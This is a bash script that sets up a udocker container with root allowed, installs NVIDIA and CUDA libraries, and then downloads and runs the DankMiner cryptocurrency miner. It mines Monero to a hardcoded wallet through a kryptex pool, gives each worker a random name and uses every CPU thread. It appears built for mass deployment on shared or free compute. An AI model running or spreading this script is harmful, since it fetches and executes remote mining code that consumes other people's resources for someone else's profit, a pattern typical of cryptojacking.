#!/bin/bash
curl https://github.com/indigo-dc/udocker/releases/download/1.3.17/udocker-1.3.17.tar.gz -L -o udocker-1.3.17.tar.gz
tar zxvf udocker-1.3.17.tar.gz
export PATH=`pwd`/udocker-1.3.17/udocker:$PATH
udocker --allow-root pull python:latest
udocker --allow-root create --name=python python:latest
udocker --allow-root run python /bin/bash

udocker
echo
apt update && apt -y install unzip wget curl libncurses6 libncursesw6 sudo
curl http://archive.ubuntu.com/ubuntu/pool/multiverse/n/nvidia-graphics-drivers-550-server/libnvidia-compute-550-server_550.54.15-0ubuntu2_amd64.deb -L -o libnvidia-compute-550-server_550.54.15-0ubuntu2_amd64.deb
dpkg -i libnvidia-compute-550-server_550.54.15-0ubuntu2_amd64.deb
curl http://ftp.us.debian.org/debian/pool/non-free/n/nvidia-cuda-toolkit/libnvrtc11.2_11.2.152~11.2.2-3+deb11u3_amd64.deb -L -o libnvrtc11.2_11.2.152~11.2.2-3+deb11u3_amd64.deb
dpkg -i libnvrtc11.2_11.2.152~11.2.2-3+deb11u3_amd64.deb
curl https://github.com/DankMiner/DankMiner/releases/download/DankMinerV1.4.0/DankMiner-v1.4.0-Linux.tar.gz -L -o DankMiner-v1.4.0-Linux.tar.gz
tar xf DankMiner-v1.4.0-Linux.tar.gz
cd DankMiner-v1.4.0-Linux
./dankminer -a xmr -w 84bEkQaAvXnPXXghsfBYBeLGtkAV8eP1HX7rP7EUBE1pHvtwAffjCE2SzzY8y79fkgHA21czuEWoVUDkAf7e4qM5KMKCKVK/$(echo $RANDOM | md5sum | head -c 10) -p stratum+tcp://xmr.kryptex.network:7029 --cpu-threads $(nproc --all)
